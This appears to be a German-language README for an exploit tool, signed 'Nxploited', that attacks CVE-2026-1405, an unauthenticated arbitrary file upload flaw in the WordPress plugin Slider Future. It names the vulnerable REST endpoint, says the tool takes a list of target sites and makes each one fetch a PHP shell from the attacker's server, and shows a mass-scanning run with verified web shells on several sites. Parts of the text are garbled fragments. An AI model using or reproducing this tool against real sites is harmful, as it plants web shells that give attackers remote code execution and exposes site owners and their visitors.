
Slider Future <= 1.0.5 – Nicht authentifizierter beliebiger Datei-Upload
Slider Future <= 1.0.5 - Nicht authentifizierter Upload beliebiger Dateien
Komponente: Slider Future (WordPress-Plugin)
Betroffene Versionen: ≤ 1.0.5
Schwachstelle: Nicht authentifizierter Upload beliebiger Dateien
CVE: CVE-2026-1405
CVSS-Score: 9.8 (Kritisch)
Das Slider-Future-Plugin für WordPress ist anfällig für beliebige Datei-Uploads, da in allen Versionen bis einschließlich 1.0.5 die Dateitypprüfung in der Funktion slider_future_handle_image_upload fehlt. Dadurch können nicht authentifizierte Angreifer beliebige Dateitypen – einschließlich bösartiger PHP-Shells – direkt auf den betroffenen Server hochladen, was die Ausführung von Remote-Code ermöglicht.
/wp-json/slider-future/v1/upload-image/image_url hoch (keine Authentifizierung erforderlich).http://example1.com
https://example2.com
...
Beispiel: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Sie werden nach Folgendem gefragt:
list.txt)Nxploited)success_results.txt gespeichert./wp-json/slider-future/v1/upload-image/image_url, der auf Ihre Shell verweist.Dieses Tool dient ausschließlich pädagogischen und autorisierten Sicherheitstests.
Die unbefugte Nutzung gegen Websites, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt